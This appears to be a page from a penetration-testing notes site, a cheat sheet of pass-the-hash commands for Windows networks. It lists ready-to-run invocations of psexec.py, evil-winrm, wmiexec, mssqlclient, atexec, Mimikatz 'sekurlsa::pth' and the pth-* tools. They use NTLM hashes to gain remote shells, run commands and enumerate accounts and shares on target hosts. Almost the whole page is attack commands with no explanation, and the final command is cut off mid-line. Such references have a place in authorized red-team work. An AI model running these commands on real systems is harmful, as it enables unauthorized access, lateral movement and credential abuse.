Pass-the-hash

Last updated 1 year ago

Pass-the-hash

PsExec

proxychains -q psexec.py -k -no-pass domain.com/username@machine -dc-ip IP -tartget-ip IP

python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2

WinRM

evil-winrm -i 192.168.1.2 -u [domain\\]username -H 052e763020c5da81d4085a05e69b0f1b

WMI

python3 impacket/examples/wmiexec.py -k --no-pass [domain/]username@192.168.1.2

SQL

python3 impacket/examples/mssqlclient.py -p 1433  -windows-auth domain/username@1.1.1.1 -hashes :052e763020c5da81d4085a05e69b0f1b

Mimikatz

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:admin /domain:red.local /ntlm:09238831b1af5edab93c773f56409d96" exit

other

python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2/c$

pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2 "select Name from Win32_UserAccount"

python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2

pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.2

python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2 whoami

python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 i

PreviousPivoting NextRemote Access

Last updated 1 year ago